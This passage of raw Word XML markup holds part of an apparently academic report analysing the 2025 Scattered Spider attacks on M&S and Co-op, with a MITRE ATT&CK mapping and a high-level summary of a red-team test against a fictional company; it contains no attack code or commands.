        <w:t xml:space="preserve">. The two-pronged approach utilized in this report seeks to encapsulate this modern approach by both critiquing the 2025 Scattered Spider attack </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F870C5">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>onMarks</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F870C5">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve"> &amp; Spencer </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F870C5">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>andCo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F870C5">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve"> operative </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00F870C5">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>Group,as</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00F870C5">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve"> well as using a live Red Teaming penetration test to simulate adversary </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F870C5">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>behavior</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F870C5">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F870C5">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>againstABCD</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F870C5">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F870C5">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>Ltd's</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F870C5">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve"> virtualized infrastructure.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BFCF4F2" w14:textId="77777777" w:rsidR="00AD5488" w:rsidRPr="00F870C5" w:rsidRDefault="00AD5488" w:rsidP="00AD5488">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7A51F7A4" w14:textId="77777777" w:rsidR="00AE6741" w:rsidRDefault="00AE6741" w:rsidP="00AD5488">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F870C5">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve">The Scattered Spider campaign, attributed to Octo Tempest (UNC3944), perfectly illustrates how the combination of social engineering for initial access, MFA fatigue and identity-based attack vectors can penetrate even hardened technical controls. As recorded by NCSC, CrowdStrike, and Microsoft MSTIC, the threat group avoids the use of zero-days in </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F870C5">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>favor</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F870C5">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve"> of exploiting helpdesks, attacking vulnerable authentication mechanisms, and using compromised valid credentials for lateral movement and privilege escalation. While specific to the incidents, the events against these major UK organizations serve as testament to a systemic problem within </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F870C5">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>theUK</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F870C5">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>; the human layer remains the largest attack surface and 68% of all breaches involved the human element, per the Verizon DBIR.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="734447D4" w14:textId="77777777" w:rsidR="00AD5488" w:rsidRPr="00F870C5" w:rsidRDefault="00AD5488" w:rsidP="00AD5488">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="35964A23" w14:textId="77777777" w:rsidR="00AE6741" w:rsidRPr="00F870C5" w:rsidRDefault="00AE6741" w:rsidP="00AD5488">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F870C5">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve">In an effort to mirror these real-world adversaries in a controlled environment, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F870C5">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>theRed</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F870C5">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve"> Team engagement </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F870C5">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>againstABCD</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F870C5">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F870C5">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>Ltdwas</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F870C5">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve"> conducted. During this operation, three key flaws were exploited; a compromised, vulnerable FTP </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00F870C5">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>service( CVE</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00F870C5">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve"> 2011 2523) allowing unauthenticated access with root privileges, a low strength set of domain-level Windows Administrator accounts granting full compromise over the domain, and an SQLi vulnerability allowing for full database exfiltration. The common threads between these exploitable weaknesses are identical to those seen in the Scattered Spider incident; insufficient authentication control, insufficient detection capabilities and exploitable trust models.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61A6E86B" w14:textId="00436541" w:rsidR="00AE6741" w:rsidRDefault="00AE6741" w:rsidP="00AD5488">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F870C5">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve">In essence, the two components of this report together map the full modern range of cyber risk from the human-based approach to a technical </w:t>
      </w:r>
      <w:r w:rsidR="00AD5488" w:rsidRPr="00F870C5">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>exploitation-based</w:t>
      </w:r>
      <w:r w:rsidRPr="00F870C5">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve"> methodology. Using real world adversary </w:t>
      </w:r>
      <w:r w:rsidR="00AD5488" w:rsidRPr="00F870C5">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>behaviour</w:t>
      </w:r>
      <w:r w:rsidRPr="00F870C5">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve"> and a detailed penetrating test we are able to identify that identity compromise, weak access controls and lack of effective detection enables these attacks; this forms the basis for the ensuing recommendations of ZTA, phishing-resistant MFA, </w:t>
      </w:r>
      <w:r w:rsidR="00AD5488" w:rsidRPr="00F870C5">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>behavioural</w:t>
      </w:r>
      <w:r w:rsidRPr="00F870C5">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve"> analytics and Secure by Design.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17F1841C" w14:textId="77777777" w:rsidR="00AD5488" w:rsidRDefault="00AD5488" w:rsidP="00AD5488">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0BBA0BB1" w14:textId="77777777" w:rsidR="00AD5488" w:rsidRDefault="00AD5488" w:rsidP="00AD5488">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="10EC46A1" w14:textId="77777777" w:rsidR="00AD5488" w:rsidRDefault="00AD5488" w:rsidP="00AD5488">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="639C60D0" w14:textId="77777777" w:rsidR="00AD5488" w:rsidRPr="00F870C5" w:rsidRDefault="00AD5488" w:rsidP="00AD5488">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5B2F4A8E" w14:textId="77777777" w:rsidR="00AE6741" w:rsidRPr="00F870C5" w:rsidRDefault="00AE6741" w:rsidP="00AD5488">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="639E5351" w14:textId="0045B8E7" w:rsidR="00277817" w:rsidRPr="00F870C5" w:rsidRDefault="00277817" w:rsidP="00AD5488">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F870C5">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Task-1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B6F90D9" w14:textId="6AE784A1" w:rsidR="00316BC8" w:rsidRPr="00F870C5" w:rsidRDefault="00000000" w:rsidP="00AD5488">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F870C5">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
        <w:t>Scattered Spider 2025:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42149F50" w14:textId="77777777" w:rsidR="00316BC8" w:rsidRPr="00F870C5" w:rsidRDefault="00000000" w:rsidP="00AD5488">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F870C5">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>A Critical Analysis of the M&amp;S and Co-op Cyber Attacks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CF7E255" w14:textId="77777777" w:rsidR="00316BC8" w:rsidRPr="00F870C5" w:rsidRDefault="00316BC8" w:rsidP="00AD5488">
      <w:pPr>
        <w:spacing w:before="60"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="40777D27" w14:textId="73061A23" w:rsidR="00316BC8" w:rsidRPr="00F870C5" w:rsidRDefault="0016609A" w:rsidP="00AD5488">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F870C5">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidR="00000000" w:rsidRPr="00F870C5">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>. Incident Summary and Timeline Analysis</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43091B28" w14:textId="58F627AD" w:rsidR="00316BC8" w:rsidRPr="00F870C5" w:rsidRDefault="0016609A" w:rsidP="00AD5488">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F870C5">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidR="00000000" w:rsidRPr="00F870C5">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>.1 Narrative Timeline</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F63AD24" w14:textId="77777777" w:rsidR="00316BC8" w:rsidRPr="00F870C5" w:rsidRDefault="00000000" w:rsidP="00AD5488">
      <w:pPr>
        <w:spacing w:before="80"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F870C5">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>Both the M&amp;S and Co-op incidents followed a strikingly consistent kill chain, reinforcing the attribution to a single threat actor with standardised operating procedures. The timeline below, constructed from open-source intelligence (OSINT), NCSC advisories [3], and media reporting [1][2], illustrates key phases:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DF60F3A" w14:textId="77777777" w:rsidR="00316BC8" w:rsidRPr="00F870C5" w:rsidRDefault="00316BC8" w:rsidP="00AD5488">
      <w:pPr>
        <w:spacing w:before="60"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5950C0E8" w14:textId="77777777" w:rsidR="003064E4" w:rsidRDefault="00F92999" w:rsidP="00AD5488">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F92999">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="42B84573" wp14:editId="34233844">
            <wp:extent cx="5102739" cy="3636818"/>
            <wp:effectExtent l="0" t="0" r="3175" b="1905"/>
            <wp:docPr id="36477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71380" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId8"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5105821" cy="3639015"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="2322D812" w14:textId="3A9AA24A" w:rsidR="00316BC8" w:rsidRPr="003064E4" w:rsidRDefault="00000000" w:rsidP="00AD5488">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F870C5">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Figure 1 — Incident Timeline: M&amp;S and Co-op Attacks (2025)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F5FB84E" w14:textId="77777777" w:rsidR="00F92999" w:rsidRPr="00F870C5" w:rsidRDefault="00F92999" w:rsidP="00AD5488">
      <w:pPr>
        <w:spacing w:before="120"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2F7E4C00" w14:textId="0724019A" w:rsidR="00F92999" w:rsidRDefault="00F92999" w:rsidP="00AD5488">
      <w:pPr>
        <w:spacing w:before="60"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F92999">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0B5E1690" wp14:editId="33944CD5">
            <wp:extent cx="4677428" cy="2905530"/>
            <wp:effectExtent l="0" t="0" r="8890" b="9525"/>
            <wp:docPr id="773749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49979" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId9"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4677428" cy="2905530"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F5F2D11" w14:textId="4058F365" w:rsidR="00316BC8" w:rsidRPr="00F870C5" w:rsidRDefault="00000000" w:rsidP="00AD5488">
      <w:pPr>
        <w:spacing w:before="60"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F870C5">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Source: Compiled from NCSC [3], CrowdStrike [4], BBC News [1], Financial Times [2]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0150D7AC" w14:textId="77777777" w:rsidR="00316BC8" w:rsidRPr="00F870C5" w:rsidRDefault="00316BC8" w:rsidP="00AD5488">
      <w:pPr>
        <w:spacing w:before="60"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="156E8394" w14:textId="65C7E915" w:rsidR="00316BC8" w:rsidRPr="00F870C5" w:rsidRDefault="0016609A" w:rsidP="00AD5488">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F870C5">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidR="00000000" w:rsidRPr="00F870C5">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>.2 Critical Comparative Analysis: M&amp;S vs Co-op</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7286B1B6" w14:textId="77777777" w:rsidR="0088421C" w:rsidRPr="00F870C5" w:rsidRDefault="0088421C" w:rsidP="00AD5488">
      <w:pPr>
        <w:spacing w:before="80"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F870C5">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>Although both incidents conformed to the established TTPs of Scattered Spider, there were significant disparities in detection and response times that warrant critical examination. M&amp;S is reported to have incurred losses in excess of £300 million in online sales [2], implying a protracted dwell time and a correspondingly delayed detection capability. The Co-op, by contrast, appears to have experienced comparatively less operational disruption, a differential that may be attributable to more timely anomaly detection or the prior dissemination of relevant threat intelligence.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="400FE04C" w14:textId="77777777" w:rsidR="0088421C" w:rsidRPr="00F870C5" w:rsidRDefault="0088421C" w:rsidP="00AD5488">
      <w:pPr>
        <w:spacing w:before="80"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F870C5">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>This difference is analytically important: it supports the proposition that organisational resilience is not only a matter of preventative controls but also of the maturity of detection and response. As Anderson [13] contends, the pertinent question is not whether a determined adversary will breach the perimeter, but how rapidly they can be detected and contained thereafter. The extended impact period sustained by M&amp;S suggests that its Security Operations Centre (SOC) did not have the behavioural analytics to correlate early-stage indicators of compromise (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F870C5">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>IoCs</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F870C5">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>) into actionable alerts.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="740D2E98" w14:textId="2BBCF37C" w:rsidR="00316BC8" w:rsidRPr="00F870C5" w:rsidRDefault="0016609A" w:rsidP="00AD5488">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F870C5">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r w:rsidR="00000000" w:rsidRPr="00F870C5">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>. Adversary TTP Mapping — MITRE ATT&amp;CK Framework</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38C17B8C" w14:textId="437619B9" w:rsidR="00316BC8" w:rsidRPr="00F870C5" w:rsidRDefault="0016609A" w:rsidP="00AD5488">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F870C5">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r w:rsidR="00000000" w:rsidRPr="00F870C5">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>.1 Overview and Analytical Approach</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71AD8D49" w14:textId="77777777" w:rsidR="00316BC8" w:rsidRPr="00F870C5" w:rsidRDefault="00000000" w:rsidP="00AD5488">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F870C5">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>The MITRE ATT&amp;CK framework provides a curated knowledge base of adversary tactics, techniques, and procedures (TTPs) derived from real-world observation [10]. Applying this framework enables systematic identification of attack phases and facilitates comparison with documented Scattered Spider behaviour patterns from CrowdStrike's Adversary Intelligence reports [4].</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A122B26" w14:textId="77777777" w:rsidR="00316BC8" w:rsidRPr="00F870C5" w:rsidRDefault="00316BC8" w:rsidP="00AD5488">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="160E0D93" w14:textId="77777777" w:rsidR="00316BC8" w:rsidRPr="00F870C5" w:rsidRDefault="00000000" w:rsidP="00AD5488">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F870C5">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>Table 1 maps ten confirmed or strongly evidenced techniques to the M&amp;S/Co-op campaign. Each technique is assessed not merely descriptively, but with reference to the specific control failure it exploited — a critical analytical lens absent from purely descriptive mapping exercises.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="342B7FCB" w14:textId="77777777" w:rsidR="00316BC8" w:rsidRPr="00F870C5" w:rsidRDefault="00316BC8" w:rsidP="00AD5488">
      <w:pPr>
        <w:spacing w:before="60"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="03D25BDA" w14:textId="77777777" w:rsidR="00316BC8" w:rsidRPr="00F870C5" w:rsidRDefault="00000000" w:rsidP="00AD5488">
      <w:pPr>
        <w:spacing w:before="120"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F870C5">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Table 1 — MITRE ATT&amp;CK TTP Mapping: Scattered Spider Campaign 2025</w:t>
      </w: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00"/>
        <w:gridCol w:w="1800"/>
        <w:gridCol w:w="4400"/>
        <w:gridCol w:w="1860"/>
      </w:tblGrid>
      <w:tr w:rsidR="00316BC8" w:rsidRPr="00F870C5" w14:paraId="040081C8" w14:textId="77777777">
        <w:trPr>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="11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381A6A26" w14:textId="77777777" w:rsidR="00316BC8" w:rsidRPr="00605995" w:rsidRDefault="00000000" w:rsidP="00AD5488">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:color w:val="FFFFFF" w:themeColor="background1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00605995">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF" w:themeColor="background1"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>MITRE ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="18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6867173B" w14:textId="77777777" w:rsidR="00316BC8" w:rsidRPr="00605995" w:rsidRDefault="00000000" w:rsidP="00AD5488">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:color w:val="FFFFFF" w:themeColor="background1"/>
